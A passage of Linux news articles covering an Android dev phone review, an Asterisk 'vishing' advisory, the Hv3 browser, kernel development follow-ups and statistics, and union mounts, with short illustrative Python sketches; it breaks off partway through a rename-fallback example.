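The point is simply that the declared list is small and machine-readable, so
reviewing it before saying "yes" is not much work.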


Beyond the inevitable games (including one of the worst Tetris
implementations seen in a while), there is a wide variety of available
applications.  The "Locale"
tool makes up for the (surprising) lack of the sort of "profile" feature
found on almost every handset your editor has ever seen; it performs tricks
like using the GPS
receiver to automatically change profiles when the phone enters the office
or a theater.  The "bubble" application (shown on the left) turns the
handset into a portable 
level.  There's no shortage of "smart shopper" applications, most of which
can read a barcode using the camera and look up prices for items.  There is
a "power manager" which attempts to configure the device for optimal power
use in a number of situations; it provides a basic profile functionality as
well, though the user should be prepared to spend some time configuring the
options into a workable form.
There are plenty of travel-oriented applications which will fetch weather
reports, look up currency rates, or call a taxi.  


One notable omission, with both the base phone and the available
applications, is voice over IP functionality.  This handset should be able
to do VOIP beautifully, but almost no such functionality is available.
There appears to be a tool for Skype users, but that's about it.


There are a couple of applications that are of particular interest to your
editor.  ConnectBot is
an SSH client which works surprisingly well; the developers are clearly
working toward the creation of a tool useful for people logging into
Linux-like systems.  And the terminal emulator provides that all-important
feature: a shell prompt on the device.  Even more fun, on the Dev Phone, a
simple "su" with no password will yield a root shell.

Playing around on the device, your editor sees that the ARM processor
provides a mighty 383 bogomips.  It appears to have a little over 100MB of
usable memory.  It's running a 2.6.25 kernel (known to be heavily modified)
with a single loadable module called "wlan."  And so on.  As useful as the
keyboard is, trying to use it to type commands at a shell which lacks a
history mechanism gets painful after a while.  Time to go looking for an
SSH server.
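
The numbers above are the sort of thing one reads out of /proc at a shell
prompt.  As a minimal sketch, assuming the usual text formats of
/proc/cpuinfo, /proc/meminfo, and /proc/modules on a Linux system, the same
information can be gathered programmatically.  The function names are
illustrative only, and nothing here is specific to Android.

```python
import re


def parse_bogomips(cpuinfo_text):
    """Return the first BogoMIPS value in /proc/cpuinfo text, or None."""
    match = re.search(r"^bogomips\s*:\s*([\d.]+)", cpuinfo_text,
                      re.IGNORECASE | re.MULTILINE)
    return float(match.group(1)) if match else None


def parse_mem_total_kb(meminfo_text):
    """Return the MemTotal figure (in kB) from /proc/meminfo text, or None."""
    match = re.search(r"^MemTotal:\s*(\d+)\s*kB", meminfo_text, re.MULTILINE)
    return int(match.group(1)) if match else None


def parse_module_names(modules_text):
    """Return loaded module names; the name is the first field of each line."""
    return [line.split()[0] for line in modules_text.splitlines() if line.strip()]


def read_text(path):
    with open(path) as handle:
        return handle.read()


if __name__ == "__main__":
    try:
        print("bogomips:", parse_bogomips(read_text("/proc/cpuinfo")))
        print("MemTotal (kB):", parse_mem_total_kb(read_text("/proc/meminfo")))
        print("kernel:", read_text("/proc/sys/kernel/osrelease").strip())
        print("modules:", parse_module_names(read_text("/proc/modules")))
    except OSError as error:
        # Some of these files may be missing on non-Linux or restricted systems.
        print("could not read /proc:", error)
```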

There are other useful applications, of course, such as the one which actually
makes phone calls.  Like the others, it lacks perfection, but one can only
assume that, on a platform driven by free software, imperfect
applications will be improved or replaced.  How easy it is to do such
things is part of what your editor intends to find out in the coming
months.  Stay tuned.

		"Vishing" advisory targets Asterisk


A light-on-details warning—issued late on a Friday no less—had
users of the Asterisk telephony
platform scrambling recently.  It was issued by a US government group that
includes the FBI, which tends to attract attention, and warned of unspecified
vulnerabilities that would allow "vishing" attacks using subverted Asterisk
systems.  Vishing is a relatively new scam that uses phone calls in
phishing expeditions (the name comes from combining 'voice' with
'phishing'), but typically using systems that are owned and run by the
scammers.


Evidently, the FBI received word that Asterisk systems were being subverted
by way of a vulnerability (AST-2008-003)
reported last March.  Systems were 
then used to make "thousands of vishing telephone calls [...]
within one hour" trying to elicit 
personal information—generally credit card numbers—from victims.  
By using caller ID spoofing techniques, those calls
could appear to be coming from the credit card company itself.
Typically, a 
pre-recorded message would give the user another number to call, where they
would be prompted to enter the information via an interactive voice
response (IVR) interface.


Asterisk is a multi-purpose free software suite that can act as a private branch
exchange (PBX), handle VoIP traffic, do IVR, and more.  Because it provides
such a general purpose platform, it does make an attractive target.
It is probably also enticing to control such a device that is being run
by—and can be traced to—someone else.  But the folks at
Digium—original developers and primary maintainers of
Asterisk—don't 
really think the 
problem is as bad as was indicated.


The original problem was fixed months ago, so it clearly irks the Digium
folks that it has been fingered now.  In addition, the original advisory
didn't even point to the vulnerability so users and Digium were left to
guess what exactly was being exploited.  The advisory was updated
to include information about AST-2008-003, but there is still some
skepticism about the potential for exploitation.
On Digium's blog, community manager John Todd thinks
the problem was overstated: 

While I won't get into the details of configuration specifics, I would say
that an administrator would have to consciously configure their system in
what I believe to be an extremely unusual way in order to be victimized by
this particular vulnerability.  The flexibility of Asterisk lets a
developer do almost anything, but it seems that there would need to be an
almost absurd configuration circumstance that would allow this bug to be
harmful in the way described.


While it may well be that this particular vulnerability is difficult to
exploit, there will likely be others down the road that are less so.  While
some users may be getting a little more wary about phishing and email-based
scams in general, phone calls have generally been considered more trustworthy.
But it is no longer true that phone numbers are definitely traceable back to 
a physical location with a billed party known by the telephone company.  Much
of this information can be spoofed or re-routed in ways that make detection 
more difficult.


Phones have certainly been used in scams over the years, but the advent of 
caller ID has tended to put an undeserved stamp of authenticity on certain 
calls.  If a pre-recorded message purports to come from GiantCompany and the
caller ID entry has that name, it is easy to conclude that the call is genuine.
Much of the same effort that has gone into educating the public about phishing
will also need to be applied to vishing.


This is certainly not the first instance of PBX systems being abused either.
Subverting PBXs for free long distance calls is a longstanding trick in the
"phreaking" community.  But Asterisk provides a much more capable platform, 
thus a much more useful tool, both for those that run them and those that 
subvert them.  Asterisk users need to keep that in mind when security
issues come to light.


		Hv3 and the art of minimalist web-browsing


Even if you appreciate full-featured applications like OpenOffice.org,
Firefox, or GNOME, minimalist replacements have a fascination all their
own. Not only are minimalist applications a throwback to the original
traditions of Unix-like operating systems, but their emphasis on efficiency
at the expense of extra features can force you to re-evaluate your
computing needs. A case in point is Hv3, a web browser written in
Tcl/Tk. Although currently in alpha and paying more attention to
developers' needs than those of end users, Hv3 is already highly suitable
for basic web-browsing, with a design philosophy all its own -- and, quite
possibly, the fastest performance of any free software browser.


Hv3 is available for
both GNU/Linux and Windows. Packages of nightly builds are available for
Puppy Linux, but the users of most distributions must fall back on
statically-linked tarballs, following the instructions on the download page
to obtain the latest build with wget, then de-compress it and change the
permissions. You can also download the
source code, as well as Tkhtml3, a development tool for
embedding a standards-compliant HTML/CSS implementation in applications,
which Hv3 itself uses.


When you start Hv3, you also have the option of installing hv3_polipo, a small
web cache, in the same directory. You can run Hv3 without hv3_polipo -- at
the expense of clicking through the same dialog each time you start the
application -- but, if you are an end user, there is no reason not to install
hv3_polipo. In fact, there is every reason to do so, since it increases
Hv3's speed by at least 25%.


Using Hv3

Hv3 opens on a gun metal gray window with four top-level menus, a
toolbar consisting of five basic navigation choices, and the URL entry field
(as well as debugging tools that are, presumably, temporary). At the bottom
is a status bar that gives instructions for toggling between modes, but
apparently does nothing yet. Both bookmarks and downloads open in separate
tabs, rather than in a menu or a floating window, which makes for a less
cluttered appearance than in most browsers, but does result in each new tab
opening by displaying bookmarks. This default occasionally comes in handy,
but is more often an annoying preliminary step to what you really want to
do.


Two unusual features in the Hv3 window are the ability to hide the menus
and toolbar to maximize display space, and a tree view of the page's HTML source.
Both are available from the right-click menu for a link. The tree
view is especially welcome, since it is quicker to navigate than the plain
text file of markup you get in most browsers. The difference, I suspect, is
that Hv3 assumes that users are actively interested in looking through
the markup and using it as efficiently as possible, so that the view is not
just an after-thought.


So far, at least, search capacity is minimal in Hv3, differing little from
Firefox's except in the fact that searches of both the web and the current
page are grouped together and given prominence by a top-level search
menu. Again, the impression is that Hv3 developers are thinking of what
might be convenient for those who make regular use of the feature.


You can configure Hv3 from the Options menu, choosing the icon set to use
in the toolbar, and the size (but not the typeface) to use for the widgets
and on web pages. For some reason, you have three choices for font size on
web pages: The page zoom, the font scale (a percentage), and the font size
table (a description). You also have the option of disabling the display of
images for greater speed, and of turning off support for ECMAScript, which
provides support for what is commonly referred to as JavaScript.


Bookmarks

As you explore Hv3, you will probably want to start by opening the Bookmark
tab. For one thing, Hv3 seems to have paid most attention to bookmarks
among the most common browser features. Because bookmarks in Hv3 open in a
separate tab, they display a tree-view list on the left, and the actual
page on the right, making them easy to learn.


More importantly, the default bookmarks include a short but adequate page
explaining the features of Hv3. An especially noteworthy feature is the
distinction between regular bookmarks, which open directly on the page, and
snapshots, an archived version of a bookmark that can be used to work
off-line. You can tell a regular bookmark because it is indicated in the
tree view by having a cyan colored circle for an icon, while a snapshot has
an icon resembling a page. 


There is also a third type of bookmark that is a snapshot that retains a
link to the original. You can tell this type of bookmark by clicking on its
icon and watching it toggle back and forth between the other two, a distinction that
seems all too easy to miss.


Another reason for turning early to the Bookmarks tab is to use the Import
Data button to import bookmarks from Firefox. The process lasts less than
ten seconds, and is almost formidably efficient: Not only your personal
bookmarks, but the default bookmarks for your distribution and Firefox's
default bookmarks are added to the tree view -- regardless of whether they
still appear on your personal toolbox in Firefox or not.


Speed vs. Geekiness

Many of Hv3's features suggest an effort to rethink functionality that you
can easily take for granted in your daily browsing. However, what interests
many people about minimalist web browsers is their speed. In this category,
Hv3 is in a class by itself. Without hv3_polipo installed (see above), Hv3
loads pages roughly 50% faster than Firefox, and at about the same speed as Dillo, perhaps the best known minimalist
browser. However, with hv3_polipo installed, Hv3 loads pages nearly twice
as quickly as Firefox, and about 50% faster than Dillo. 


Moreover, Hv3 has the advantage over Dillo of supporting JavaScript, which
means that it displays more pages correctly than Dillo does -- although, if
you are watching, you will see any text-only alternative pages display
before Hv3 renders a JavaScript page. If Hv3 would only include a Flash
plugin, possibly using Gnash, the free Flash replacement, then its users
would have few basic reasons to envy the users of heavyweight browsers like
Firefox except the absence of an active extensions-building community.


In its current release, Hv3 pays little attention to usability. Not only
are the debugging tools prominently displayed, but some of the options,
such as "GUI fonts" or "Force CSS metrics" seem pitched at the understanding of
developers more than that of everyday users. However, the interface names
are not that hard to figure out, particularly since they are relatively
few. Presumably, too, the Hv3 team is more concerned with performance right
now than finishing details, and will get around to such concerns closer to
the first full release. 


For now, the lack of polish seems a small price to pay for the speed and
simplicity of Hv3 -- to say nothing of the reminder that useful and
thoughtful alternatives exist to well-known applications.


		Followups: performance counters, ksplice, and fsnotify


There's been progress in a few areas which LWN has covered in the past.
Here's a quick followup on where things stand now.

Performance monitors

In last week's episode, a
new, out-of-the-blue performance monitoring patch had stirred up discussion
and a certain amount of opposition.  The simplicity of the new approach by
Ingo Molnar and Thomas Gleixner had some appeal, but it is far from clear
that this approach is sufficiently powerful to meet the needs of the wider
performance monitoring community.

Since then, version 3 and version 4 of the patch have been
posted.  A look at the changelogs shows that work on this code is
progressing quickly.  A number of changes have been made, including:


 The addition of virtual performance counters for tracking clock time,
     page faults, context switches, and CPU migrations. 

 A new "performance counter group" functionality.  This feature is
     meant to address criticism that the original interface would not allow
     multiple counters to be read simultaneously, making it hard to
     correlate different counter values.  Counters can now be associated
     into multiple groups which allow them to be manipulated as a unit.
     There's also a new mechanism allowing all counters to be turned on or
     off with a single system call.

 The system call interface has been reworked; see the version 3
     announcement for a description of the new API.

 The kerneltop utility has been enhanced to work with performance
     counter groups.

 "Performance counter inheritance" is now supported; essentially, this
     allows a performance monitoring utility to follow a process through a
     fork() and monitor the child process(es) as well.

 The new "timec" utility runs a process under performance monitoring,
     outputting a whole set of statistics on how the process ran.
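
The new system call interface is still changing from one posting to the
next, so no attempt is made to show it here.  As a rough analogy only, the
sketch below runs a command and reports a few of the same software-level
statistics (page faults, context switches, CPU time) using the
long-standing getrusage() accounting, which is available from Python's
standard library.  This is not the performance counter API and says nothing
about hardware counters; the function name run_with_stats is made up for
the example.

```python
import resource
import subprocess
import sys
import time


def run_with_stats(argv):
    """Run argv to completion and return resource statistics for it.

    Uses RUSAGE_CHILDREN, which accumulates usage for children that have
    been waited for, so the difference before/after covers this command.
    """
    before = resource.getrusage(resource.RUSAGE_CHILDREN)
    start = time.monotonic()
    completed = subprocess.run(argv)
    elapsed = time.monotonic() - start
    after = resource.getrusage(resource.RUSAGE_CHILDREN)
    return {
        "returncode": completed.returncode,
        "wall_seconds": elapsed,
        "user_seconds": after.ru_utime - before.ru_utime,
        "system_seconds": after.ru_stime - before.ru_stime,
        "minor_faults": after.ru_minflt - before.ru_minflt,
        "major_faults": after.ru_majflt - before.ru_majflt,
        "voluntary_switches": after.ru_nvcsw - before.ru_nvcsw,
        "involuntary_switches": after.ru_nivcsw - before.ru_nivcsw,
    }


if __name__ == "__main__":
    # Measure a trivial child process: a Python interpreter that exits at once.
    for key, value in run_with_stats([sys.executable, "-c", "pass"]).items():
        print(f"{key:>22}: {value}")
```

Because the child's usage is only folded into the parent's totals once the
child has been waited for, grandchildren are counted only if the command
itself waits for them; the inheritance feature described above is meant to
follow forked processes directly.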


There are still concerns about this new approach to performance monitoring,
naturally.  Developers worry that users may not be able to get the
information they need, and it still seems like it may be necessary to put a
huge amount of hardware-specific programming information into the kernel.
But, to your editor's eye, this patch set also seems to be gaining a bit of
the sense of inevitability which usually attaches itself to patches from
Ingo and company.  It will probably be some time, though, before a decision
is made here.

Ksplice

In November, we looked at a
new version of the Ksplice code, which allows patches to be put into a
running kernel.  The Ksplice developers would like to see their work go
into the mainline, so they recently poked Andrew Morton to see what the
status was.  His response was:


	It's quite a lot of tricky code, and fairly high maintenance, I expect.
	
	I'd have _thought_ that distros and their high-end customers would
	be interested in it, but I haven't noticed anything from them.  Not
	that this means much - our processes for gathering this sort of
	information are rudimentary at best.


The response on the list, such as it was, indicated that the distributors
are, in fact, not greatly interested in this feature.  Dave Jones commented:


	It's a neat hack, but the idea of it being used by even a small percentage
	of our users gives me the creeps....
	
	If distros can't get security updates out in a reasonable time, fix
	the process instead of adding mechanism that does an end-run around it.
	Which just leaves the "we can't afford downtime" argument, which leads
	me to question how well reviewed runtime patches are.
	Having seen some of the non-ksplice runtime patches that appear in the
	wake of a new security hole, I can't say I have a lot of faith.


The Ksplice developers agree that the
writing of custom code to fit patches into a running kernel is a scary
proposition; that is why, they say, they've gone out of their way to make
such code unnecessary most of the time.

This discussion leaves Ksplice in a bit of a difficult position; in the
absence of clear demand, the kernel developers are unlikely to be willing
to merge a patch of this nature.  If this is a feature that users really
want, they should probably be communicating that fact to their
distributors, who can then consider supporting it and working to get it
into the mainline.


fsnotify

The file scanning mechanism known as TALPA got off to a rough start
with the kernel development community.  Many developers have a dim view of
the malware scanning industry in general, and they did not like the
implementation that was posted.  It is clear, though, that the desire for
this kind of functionality is not going away.  So developer Eric Paris has
been working toward an implementation which will pass review.

His latest attempt can be seen in the form of the fsnotify patch set.  This code
does not, itself, support the malware scanning functionality, but, says
Eric, "you better know it's coming."  What it does, instead,
is to create a new, low-level notification mechanism for filesystem events.

At a first look, that may seem like an even more problematic approach than
was taken before.  Linux already has two separate file event notifiers:
dnotify and inotify.  Kernel developers tend to express their
dissatisfaction with those interfaces, but there has not been a whole lot
of outcry for somebody to add a third alternative.  So why would fsnotify
make sense?

Eric's idea seems to be to make something that so clearly improves the
kernel that people will lose the will to complain about the malware
scanning functionality.  So fsnotify has been written - employing a lot of
input from filesystem developers - to be a better-thought-out, more
supportable notification subsystem.  Then the existing dnotify and inotify
code is ripped out and reimplemented on top of fsnotify.  The end result is
that the impact on the rest of the VFS code is actually reduced; there is
now only one set of notifier calls where, previously, there were two.  And,
despite that, the notification mechanism has become more general, being
able to support functionality which was not there in the past.
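
For readers who have never used the existing notifiers, the sketch below
shows the kind of user-space inotify usage that would sit on top of any
reworked implementation.  It calls the C library's inotify_init() and
inotify_add_watch() through ctypes, creates a file in the watched
directory, and decodes the resulting event.  It assumes a Linux system with
inotify enabled; the function name watch_one_create is made up for the
example, and nothing here touches the fsnotify patches themselves.

```python
import ctypes
import os
import struct
import tempfile

IN_CREATE = 0x00000100                  # value from <sys/inotify.h>
EVENT_HEADER = struct.Struct("iIII")    # wd, mask, cookie, len


def watch_one_create(directory, filename):
    """Watch directory for creations, create filename, return (mask, name) events."""
    libc = ctypes.CDLL(None, use_errno=True)
    fd = libc.inotify_init()
    if fd < 0:
        raise OSError(ctypes.get_errno(), "inotify_init failed")
    try:
        wd = libc.inotify_add_watch(fd, os.fsencode(directory), IN_CREATE)
        if wd < 0:
            raise OSError(ctypes.get_errno(), "inotify_add_watch failed")
        # Trigger an event; it is queued before open() returns.
        open(os.path.join(directory, filename), "w").close()
        data = os.read(fd, 4096)
    finally:
        os.close(fd)

    events = []
    offset = 0
    while offset < len(data):
        _wd, mask, _cookie, length = EVENT_HEADER.unpack_from(data, offset)
        offset += EVENT_HEADER.size
        # The name field is padded with NUL bytes up to "length".
        name = data[offset:offset + length].rstrip(b"\0").decode()
        offset += length
        events.append((mask, name))
    return events


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as scratch:
        for mask, name in watch_one_create(scratch, "hello.txt"):
            print(f"mask={mask:#x} name={name}")
```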

And, to top it off, Eric has managed to make the size of the in-core
inode structure smaller.  Given that there can be thousands of
those structures in a running system, even a small reduction in their
size can make a big difference.  So, claims Eric, "That's
right, my code is smaller and faster.  Eat that."

What this code needs now is detailed review from the core VFS developers.
Those developers tend to be a highly-contended resource, so it's not clear
when they will be able to take a close look at fsnotify.  But, sooner or
later, it seems likely that this feature will find its way into the
mainline.

		Development statistics for 2.6.28


As of this writing, the 2.6.28 kernel is getting quite close to its final
release.  The flow of patches into the mainline repository has slowed to a
trickle.  So it becomes appropriate to look at what was done in this
development cycle, and where all that code came from.

In these articles, your editor routinely forgets to thank Greg
Kroah-Hartman, who continues to 
do a lot of work to ensure that these statistics are at least moderately
accurate.  So we'll get that taken care of at the outset: thanks, Greg!


The 2.6.28 development cycle has seen the incorporation of just under 9,000
changesets; that makes it a bit smaller in this regard than 2.6.27 (10,600)
or 2.6.26 (10,100).  The development base broadened, though; 1,262
developers have contributed to 2.6.28, more than has been seen with its
predecessors.  Those developers added 769,000 lines of code while removing
285,000, for a net growth of 484,000 lines - a relatively large amount.
Much of that growth came by way of a single developer, as we will see
below.


In recent development cycles, some 25% of the patches merged were accepted
after the close of the merge window.  Linus Torvalds has been making sounds
about tightening the criteria for patches during the stabilization period,
to the point that they would have to address known regressions to be
accepted.  A look at 2.6.28, though, shows that 1835 patches (so far) have
gone in since 2.6.28-rc1.  At 20% of the total, the patch flow rate during
the stabilization period has fallen - but not by much.
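
The arithmetic behind these figures can be checked with a few lines of Python. This is only a sketch: the article gives the changeset total as "just under 9,000", so the rounded value of 9,000 used here is an assumption, and the variable names are purely illustrative.

```python
# Figures quoted in the article; the total is rounded (an assumption),
# since the text only says "just under 9,000" changesets.
TOTAL_CHANGESETS = 9_000
POST_RC1_PATCHES = 1_835      # patches merged since 2.6.28-rc1
LINES_ADDED = 769_000
LINES_REMOVED = 285_000


def share(part, whole):
    """Return part/whole expressed as a percentage."""
    return 100.0 * part / whole


post_rc1_share = share(POST_RC1_PATCHES, TOTAL_CHANGESETS)
net_growth = LINES_ADDED - LINES_REMOVED

print(f"post-rc1 share: {post_rc1_share:.1f}%")
print(f"net growth: {net_growth:,} lines")
```

With the rounded total, the post-rc1 share comes out at roughly one fifth, which is consistent with the 20% figure given above.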


So where did these patches come from?  Here are the top twenty contributors
to 2.6.28:


On the changesets side, David Miller contributes a lot of work to the
network stack, but the bulk of his changes this time around are to the
SPARC architecture code.  Yinghai Lu is a constant source of x86
architecture patches.  Al Viro returns to the list with a lot of cleanup
work in the VFS code, user-mode Linux, and beyond.  Bartlomiej
Zolnierkiewicz continues to clean up the legacy IDE code, despite the fact
that its user base is shrinking.  And Alexey Dobriyan contributed work in a
number of areas, with the bulk of it being in the netfilter subsystem and
/proc.

When looking at changed lines, one gets the sense that Greg Kroah-Hartman
has been rather busy this time around.  As it happens, Greg did not
actually write most of that code; the bulk of it came in with the addition of
the -staging tree.  It seems that Greg, the self-named "maintainer of
crap," has acquired substantial amounts of it.  Inaky Perez-Gonzalez was
the source of the patches adding support for ultrawideband radio and
wireless USB.  Expect to see him show up again soon; he is now working to get the
WIMAX subsystem into the kernel.  Mark Brown added drivers for a number of
Wolfson Micro devices.  Joseph Chan contributed the VIA framebuffer driver,
and Pavel Machek added a handful of miscellaneous drivers.

So who paid for this work to be done?  The 2.6.28 employer table looks like
this:


In general, the employer tables tend not to change too much from one
development cycle to the next.  Greg's staging tree work did put Novell at
the top of the lines-changed column, despite the fact that this work did
not originate at Novell.  As always, one needs to bear in mind that these
numbers are approximate.

One welcome change is the first-time appearance of VIA.  It
appears that this company is truly getting serious about supporting Linux,
and that can only be a good thing.


Writing all this code is important, but so is reviewing, testing, and
reporting bugs.  Continuing with a relatively new tradition, we'll look at
who shows up in patch tags indicating this kind of participation, starting
with the reviewers:


At this point, we are seeing about one Reviewed-by tag for every 100
changes going into the mainline repository.  Fortunately, the review
situation is not quite that bad; most reviewers simply do not provide these
tags for the patches they look at.

The numbers for bug reporting and patch testing look like this:


In each case, everybody with at least two credits was listed.  The good
news is that, while there are certainly some familiar names on that list, we
are also seeing appearances by people who are not known as kernel
developers.  There really is a testing community out there which includes
more than just developers.  Your editor suspects that we still are not
doing a very good job of crediting them for their work, but this convention
is relatively new and we can still hope for progress in this direction. 
To that end, the developers who are crediting reporters and testers are:


A quick grep shows that the number of Reported-by and Tested-by tags in
patches was almost exactly the same over the 2.6.27 and 2.6.28 development
cycles.  Given the smaller number of patches in 2.6.28, this indicates that
a slightly higher percentage of patches is now carrying those tags.
Emphasis on "slightly" is in order, though; we are, for the most part,
still not crediting a great many people who have helped to get 2.6.28 into
shape.

		Unifying filesystems with union mounts


Unification of filesystems is the concept of mounting several filesystems
on a single mount point, with the resulting mount showing the
logical combination of all the filesystems. Traditionally, when a
filesystem is mounted on a directory, the existing contents of the
directory are masked, and the content of the latest mounted 
filesystem is shown. These masked files are available only after the
mounted filesystem is unmounted. Even though these files exist, they
are inaccessible to the user. Union mount overcomes this by
providing access to all directories and files present in the
directory, even after a mount.

In the kernel, the filesystems are stacked in order of their mount
sequence: the first mounted filesystem is at the bottom of the
mount stack, and the latest mount is at the top of the stack. Only the
files and directories of the top of the mount stack are visible.
With union mounts, directory entries from the lower filesystems are
merged with the directory entries of the upper filesystem, thus making a
logical combination of all mounted filesystems. Files with the
same name in a lower filesystem are
masked, as the upper one takes precedence.

Union mounts could be used to update packages of a distribution on a
DVD. A writable filesystem could be mounted over the read-only filesystem
on the
DVD. All new and updated package files would be written to the writable,
topmost filesystem, while hiding the duplicate files of the read-only
media, or even deleting files (this is done through white-outs
discussed later). This allows the user to change any of the files on
the system, with the new file stored transparently in the image.
Such a setup could be used to roll up an updated DVD, or maintain
a package repository with the latest packages for network installs.

As compared to other implementations, such as unionFS, union mounts 
try to do all directory entry unification handling in the VFS layer, instead
of creating a new filesystem type. Some of the advantages of this
approach are:

Simple and lightweight design: since all merges happen inside the
   VFS, there is no need for an additional filesystem layer
   to maintain and merge metadata.

No need to re-iterate the mount stack while mounting:
   the user is not required to list the directories participating in
   the union as a part of the mount command. The mount point alone is
   enough.

Bind mounts work without any problems: this is a VFS feature to
   remount part of the filesystem hierarchy
   at additional mount points.


Union mount, 
developed by Jan Blunck, Bharata B Rao, and Miklos Szeredi,
is the first step in unifying mounts in the VFS.
The patch implementation is similar to that of the
Plan 9/Inferno
operating system. Currently, it only does namespace unification at
the root directory level and not in the subdirectories. 

To mount directories through union mount, the mount command
must be modified to recognize and set the union mount
options. The util-linux patches that update the mount command can be found at

ftp://ftp.suse.com/pub/people/jblunck/union-mount/

As an example, consider the following directory structure of
two filesystems:


Issuing the following commands will perform a union mount:


After the union, the directory structure looks like:


Unmounting the /mnt directory unwinds the filesystem mount stack:


The filesystems are stacked in the mount order in the
kernel. The MNT_UNION flag in vfsmnt is set while
mounting union mounts. 
This helps to identify that the directory entries of
the stacked filesystems are supposed to be merged. While performing
the lookup sequence, if the MNT_UNION flag is set, all root directory
entries of all filesystems are scanned. Scanning happens from top of
the filesystem stack to bottom, and the first matching entry is
returned. This way any duplicate entries in underlying filesystems are
automatically ignored.
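
The top-to-bottom scan can be modeled in a few lines of Python. This is a toy sketch and not the kernel code: each filesystem's root directory is represented by a plain dictionary, and the function names and sample entries are invented for illustration.

```python
def union_lookup(stack, name):
    """Return (layer_index, entry) for the first layer, top to bottom,
    that contains name, or None if no layer has it."""
    for index, layer in enumerate(stack):
        if name in layer:
            return index, layer[name]
    return None


def union_readdir(stack):
    """Merge root directory entries from top to bottom, skipping names
    that a higher layer has already supplied."""
    seen = set()
    merged = []
    for layer in stack:
        for name in layer:
            if name not in seen:
                seen.add(name)
                merged.append(name)
    return merged


# stack[0] stands for the most recently mounted (topmost) filesystem.
top = {"file_a": "top copy of file_a", "dir1": "top dir1"}
bottom = {"file_a": "bottom copy of file_a", "file_b": "bottom file_b"}
stack = [top, bottom]

print(union_lookup(stack, "file_a"))
print(union_readdir(stack))
```

The lookup for file_a stops at the topmost layer, so the copy in the lower layer is never seen; the merged listing contains each name only once.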

Similarly, for the readdir() call, the directory entries are read from
the topmost union mount directory to the lowest, and collected in the
cache. The cache is responsible for collecting and keeping the
directory entries across the stacked filesystem, with different
callbacks for each filesystem. Like regular files, directories are  
seekable and the position of the following read is marked by the file
position filp->f_pos. When reading from directories across
filesystems,  
it is possible that the file position exceeds the inode size of the
directory where it is merged. In such a situation, the file position
is rearranged to select the correct directory in the union stack. This
is done by subtracting the inode size if the file position exceeds
it and selecting the next member of the union.
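
As a rough illustration of that adjustment, the following Python sketch maps a union-wide file position onto a member of the union. It assumes that every member uses linear offsets smaller than its directory inode size, and it treats a position equal to the size as belonging to the next member; both the function name and that boundary choice are assumptions, not details taken from the patches.

```python
def select_union_member(f_pos, dir_sizes):
    """Map a union-wide position to (member_index, offset_in_member).

    dir_sizes lists the directory inode size of each union member,
    topmost first.  A result index equal to len(dir_sizes) means the
    position lies past the end of the whole union.
    """
    if f_pos < 0:
        raise ValueError("file position must not be negative")
    for index, size in enumerate(dir_sizes):
        if f_pos < size:
            return index, f_pos
        # Position is beyond this directory: subtract its size and
        # move on to the next member of the union.
        f_pos -= size
    return len(dir_sizes), 0


sizes = [4096, 4096]
print(select_union_member(100, sizes))
print(select_union_member(5000, sizes))
```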


This works for filesystems such as ext2 that use flat file directories.
The directory entry offsets are arranged linearly and are always smaller than
the inode size of the directory. However, some filesystems return
special cookies as directory entry offsets which are unrelated to the
position in the directory or the inode size. Updating filp->f_pos to
accommodate more directories does not work for such filesystems.


There can be multiple calls to readdir()/getdents()
routines for reading 
the entries of a single directory. Currently, the union directory cache is not
maintained across these calls. Instead, for every call the previously
read entries are re-read into the cache and newly read entries are
compared against these for duplicates before being returned
to user space. The developers are working on making this 
efficient by maintaining the cache across
readdir()/getdents() calls. 

Future Plans: Writable Unions

Currently, the namespace unification is limited to the root filesystem
directory entries. Future plans, known as writable unions,  would
come close to the implementations of unionfs namespace unification.
Directory entry merging would not be limited to the root filesystem,
but would be done for subdirectories as well. Though these patches
have been developed, they still require some time and clean up for
the mainline.

Using the example above, a writable union mount of the two filesystems
would contain: 


Note that dir1 directory now contains both file_b1 and file_c1.

All writes are directed to the topmost mounted filesystem if it is mounted
read-write. 
Mounting a new filesystem upon the current union mount makes all
filesystems lower in the stack read-only, though the unified namespace
would appear read-write to the user. Any modifications in the files
of lower filesystems is handled through copy-on-write. If a
file belonging to the lower layers of the stack is opened, the entire
file is copied on the topmost filesystem on the stack. This is also
known as copy-up, where the file is copied to the topmost layer if it
has to record a change. While performing a copy-up, the directory path
of the file is also recreated on the topmost filesystem, so that the
next time it is mounted as a union, it appears in the same location.
The older file gets masked during the directory merge the next time
the filesystems are union-mounted in the same order.
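
The copy-up idea can be imitated in user space. The sketch below is not how the kernel patches do it; it uses two ordinary directories as stand-ins for the lower and topmost layers, and the function name and sample paths are placeholders.

```python
import os
import shutil
import tempfile


def copy_up(relative_path, lower_root, upper_root):
    """Copy a file from the lower layer into the upper layer, recreating
    its directory path there, and return the path of the upper copy."""
    source = os.path.join(lower_root, relative_path)
    target = os.path.join(upper_root, relative_path)
    if not os.path.exists(target):
        os.makedirs(os.path.dirname(target) or ".", exist_ok=True)
        shutil.copy2(source, target)
    return target


# Two temporary directories stand in for the read-only and writable layers.
with tempfile.TemporaryDirectory() as base:
    lower = os.path.join(base, "lower")
    upper = os.path.join(base, "upper")
    os.makedirs(os.path.join(lower, "dir1"))
    os.makedirs(upper)
    with open(os.path.join(lower, "dir1", "file_b1"), "w") as handle:
        handle.write("original")

    # The change is recorded only in the upper copy.
    writable = copy_up(os.path.join("dir1", "file_b1"), lower, upper)
    with open(writable, "a") as handle:
        handle.write(" plus change")

    with open(os.path.join(lower, "dir1", "file_b1")) as handle:
        lower_content = handle.read()
    with open(writable) as handle:
        upper_content = handle.read()
    copied_path = os.path.relpath(writable, upper)

print(copied_path, "|", lower_content, "|", upper_content)
```

The lower file keeps its original contents, while the copy in the upper directory sits at the same relative path and carries the change.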

Rename on union mounts is handled through -EXDEV. -EXDEV
is returned 
in a rename() operation if the source and destination file paths are
on different mounted filesystems. In such a case, the application,
such as mv, resorts to a copy operation, and unlinks the file from
the filesystem from which it was moved. On union mounts, since any writes are
performed in the topmost layer, a move operation to directories in the
lower layers returns -EXDEV, which means the application must copy the
file to the new directory. If both the source and destination of the
rename() operation are in the topmost layer, the traditional
rename method is 
used.
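
From the application's side, the fallback looks roughly like the Python sketch below. The move_file() helper and its injectable rename argument are hypothetical, added only so that the cross-device case can be demonstrated without a second filesystem; errno.EXDEV, os.rename(), shutil.copy2() and os.unlink() are the standard library calls.

```python
import errno
import os
import shutil
import tempfile


def move_file(src, dst, rename=os.rename):
    """Rename src to dst; if the kernel answers EXDEV, fall back to
    copying the file and unlinking the original."""
    try:
        rename(src, dst)
        return "renamed"
    except OSError as exc:
        if exc.errno != errno.EXDEV:
            raise
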